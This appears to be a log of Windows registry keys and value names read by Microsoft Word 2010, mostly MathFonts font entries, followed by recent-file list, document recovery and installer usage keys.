HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\31738
31738
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\31738
31738
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\31738
31738
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\31738
31738
